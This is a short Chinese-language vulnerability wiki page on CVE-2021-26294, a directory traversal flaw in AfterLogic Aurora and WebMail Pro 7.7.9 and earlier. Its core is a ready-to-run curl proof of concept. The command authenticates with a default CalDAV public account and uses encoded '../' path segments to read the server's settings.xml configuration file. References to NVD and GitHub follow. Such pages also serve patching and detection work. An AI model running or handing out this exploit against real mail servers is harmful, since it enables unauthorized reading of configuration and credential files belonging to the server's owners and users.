menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right --Vulnerability-main chevron_right WebMail Pro 7.7.9 目录遍历 (CVE-2021-26294).md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    WebMail Pro 7.7.9 目录遍历 (CVE-2021-26294).md
    576 B / 2021-05-21 09:14:38
        # WebMail Pro 7.7.9 目录遍历 (CVE-2021-26294)

7.7.9及所有更低版本的AfterLogic Aurora和WebMail Pro产品受影响,允许未经授权的攻击者读取文件,比如数据库/用户配置文件等。

PoC:


```
curl -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml"
```

ref:

* https://nvd.nist.gov/vuln/detail/CVE-2021-26294
* https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26294-exposure-of-sensitive-information-vulnerability.md
    links
    file_download